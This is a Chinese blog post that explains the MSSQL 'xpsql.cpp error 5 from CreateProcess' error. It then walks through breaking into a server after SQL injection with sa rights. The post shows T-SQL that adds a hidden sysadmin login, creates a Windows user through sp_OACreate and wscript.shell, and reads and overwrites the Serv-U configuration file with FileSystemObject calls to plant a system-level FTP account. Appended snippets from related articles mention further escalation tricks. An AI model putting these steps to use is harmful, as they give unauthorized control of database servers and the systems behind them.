xpsql.cpp: 错误 5 来自 CreateProcess

最新推荐文章于 2020-03-05 19:45:43 发布
最新推荐文章于 2020-03-05 19:45:43 发布
阅读量537 收藏 2
点赞数 1
文章标签: 数据库 java mysql spring python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45926849/article/details/110185579
版权

消息 50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)

这个错误是因为 cmd设置了权限导致.

下面给些突破的方法吧
————————————————————-

1.MSSQL中一些扩展的应用

拿到地址后首先telnet一下它的1433。呵呵,这个可能很多朋友就不会注意为什么要先telnet呢?因为是SA嘛,只要能telnet上去我们就可以在注射点那里执行命令。加一个具有SA权限的sql用户上去,这样在查询分析器里执行命令要比在注射点那里方便的多呢。使用●telnet 61.129.251. x 1433 ●发现可以telnet上去. OK 马上在注射点后面执行:


exec master.dbo.sp_addlogin fishing hook;
exec master.dbo.sp_addsrvrolemember fishing,sysadmin

这个命令就是添加一个用户名为fishing密码为hook的SQL用户,权限为SA。两次执行页面都返回成功,说明用户添加成功了。使用SQL server的查询分析器连上,然后执行exec master.dbo.xp_cmdshell 'net user' 发现提示错误:


错误消息
50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)

很多朋友问过我这个错误信息是什么意思,这里解释一下,其实很简单,那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧,CMD这个进程无法创建!有可能CMD设置权限拒绝SYSTEM访问,有可能是CMD删除或者改名。以上情况都可以造成 CMD进程无法创建的。

看来直接想加用户登陆服务器是不可能了,可能有的朋友会说:不是还有SP_OAcreate 么?但是我在使用SP_OAcreate执行:


DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user fish sadfish /add'

的时候虽然提示执行成功,但是却发现用户并没有添加进去,初步估计应该是wscript.shell被删掉了。
另外如果xp_regwrite 这个存储在的话我们还可以用沙盒模式搞定他的。不过虽然以上三个重要的存储过程都不能用,但是我们还可以用xp_subdirs来列目录。在列到D盘的时候发现了服务器装有serv-u,聪明的朋友们是不是想到了什么?我们可以通过使用FSO在suer-v的●ServUDaemon.ini●里写配置信息添加一个具有system权限的ftp用户,说做就做,首先使用


declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

这段代码的意思是通过使用存储过程来读取d:\Serv-U6.3\ServUDaemon.ini里的配置信息,返回执行成功

既然可以读了 那么我们是不是可以写一个进去?继续执行


declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《这里添写自己写好的SU配置信息,刚才复制的那些都要写上去,在最后添加我们自己的,跟我们在WEBSHELL里的serv-u提权是一样的》

按F5,执行一下,发现命令执行成功,马上使用上面的语句复查一下,发现已经写进去了

OK 剩下的事情就不用我多说了吧?FTP上去,直接添加用户登陆服务器就OK了,这里就不多废话了。

,

huike008
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL SERVER 2008 执行xp_cmdshell的过程中出错,调用createprocess失败,错误代码 5 解决方案
u012949335的专栏
03-20 1万+
1、进入 控制面板----管理工具------本地安全策略 点击 本地策略--------安全选项 把“网络安全:LAN管理器身份验证级别”双击打开,选择“发送LM和NTLM响应”(原来是“没有定义”)。确认后,重新启动服务器,该问题即能解决。 ...
mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法
Yatere的天平秤
04-25 6462
<br /><br />mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。<br />    微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。<br />    原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:<br />1、替换shift文件(在开启3389情况下):<br />    下面两条语
SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器
Auspicious航的博客
03-05 1816
1、SQL Server2008数据库在进行开启复制分发的配置时,出现了报错: 正在配置... - 正在配置分发服务器 (错误) 消息 SQL Server 无法将“WIN-C6BGU7K6VUR”配置为分发服务器。 (Microsoft.SqlServer.ConnectionInfo) ------------------------------ 其他信息: 执行 Tr...
突破 xpsql.cpp 错误 5 提权1
最新发布
08-08
突破 xpsql.cpp 错误 5 提权1
iis5.1以及SQL sever2005安装方法
04-29
5. **功能选择**:根据你的需求选择要安装的功能。通常,对于开发和测试环境,可以选择“数据库引擎服务”、“客户端工具连接”等。如果你需要进行报表服务或分析服务,还需要选择相应的组件。 6. **实例配置**:你...
SQL Server SA权限总结经典技术
09-14
方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者对Sql2000情况下使用sp_addextendedproc 'xp_cmdshell','...
SQL Server 定时访问url激活数据同步示例
09-10
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' ``` 一旦`xp_cmdshell`被启用,你可以创建一个SQL Server作业来定时访问URL。例如,如果你需要定时执行一个HTTP请求来触发数据同步,可以创建一个作业并包含...
执行xp_cmdshell时发生错误--xpsql.cpp: 错误 5 来自 CreateProcess
09-25 4970
错误代码:xpsql.cpp: 错误 5 来自 CreateProcess 错误原因分析:xp_cmdshell没有执行CMD的权限。 解决方法:给CMD添加system的执行权限。
1433修复命令大全 提权错误修复.txt
03-13
1433修复命令大全 提权错误修复.txt
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 7742
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
在执行xp_cmdshell的过程中出错,调用'LogonUserW'失败,错误代码:'1909'
weixin_33856370的博客
10-23 821
     在上篇文章Could not obtain information about Windows NT group/user 'xxxx\xxxx', error code 0x5里面,我介绍了SQL Server服务启动账号域账号锁定的情况下,有些Job Owner为域账号的作业执行会报错,其实在域账号被锁定的情况下(该域账号是SQL Server服务的启动账号),执行xp_cmdshe...
调用SERVER的系统过程xp_cmdshell发生错误:xpsql.cpp:错误来自GetProxyAccount
zgqtxwd的专栏
04-28 666
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
SQLServer常见的错误及修复方法
Yatere的天平秤
05-04 3774
1433端口是SQL数据库端口,当一台服务器的SQL数据库存在弱口令就很容易被黑客攻击现在比较流行的1433,1433抓服务器就是利用这个原理。黑客一般先利用端口扫描工具批量扫描ip,找到打开1433端口的主机(一般只有作为服务器使用的主机才会打开1433端口),再利用X-SCAN或者其他工具过滤出存在SQL弱口令的主机来然后用SQL TOOLS连接主机,进行SQL或者CMD命令执行,从而 得主机的控制权,但是服务器的管理人员通常会把一些不安全的漏洞补上,所以用sql tools直接执行命令成功的几率不大,
调用MSSQLSERVER的系统过程xp_cmdshell发生错误:xpsql.cpp: 错误 来自 GetProxyAccount
平凡在心,悠然自得。【顽石潇云】
02-01 2489
--消息 50001,级别 1,状态 50001--xpsql.cpp: 错误 87 来自 GetProxyAccount(第 604 行)打开SQLSERVER的企业管理器,进入“管理”,右键点击“Sql Server代理”点击属性;首先你要“允许非SysAdmin权限的用户执行CmdExec.....”,然后指定一个账号。不过,你需要意识到这样做所存在的安全上的风险。有关英文回复:Yo
xpsql.cpp: 错误 2 来自 CreateProcess(第 737 行)
weixin_34418883的博客
03-08 327
cmd 权限问题 cacls.exe C:\WINdows\system32\cmd.exe /e /t /g system:F

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huike008

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值